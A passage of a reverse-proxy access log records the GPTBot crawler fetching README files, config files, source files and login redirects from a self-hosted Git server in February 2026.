192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" +[17/Feb/2026:15:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15191] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13439] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" +[17/Feb/2026:15:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" +[17/Feb/2026:15:36:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10836] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:15:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11319] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" +[17/Feb/2026:15:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11324] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" +[17/Feb/2026:15:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" +[17/Feb/2026:15:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md?display=source" [Client 74.7.227.38] [Length 11754] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" +[17/Feb/2026:15:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11321] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" +[17/Feb/2026:15:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md?display=source" [Client 74.7.227.38] [Length 11759] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" +[17/Feb/2026:15:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" +[17/Feb/2026:15:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:36:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Footer.tsx" +[17/Feb/2026:15:36:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/About.tsx" +[17/Feb/2026:15:36:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Header.tsx" +[17/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:15:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:15:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:15:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" +[17/Feb/2026:15:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" +[17/Feb/2026:15:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpip3" [Client 74.7.227.38] [Length 24097] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:15:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10845] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:15:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10815] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:15:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12740] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2f.venv%2fbin%2fhttpx" [Client 74.7.227.38] [Length 19408] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:15:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16173] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11142] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:15:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:15:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:15:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 10957] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:15:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:15:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:15:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:15:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip 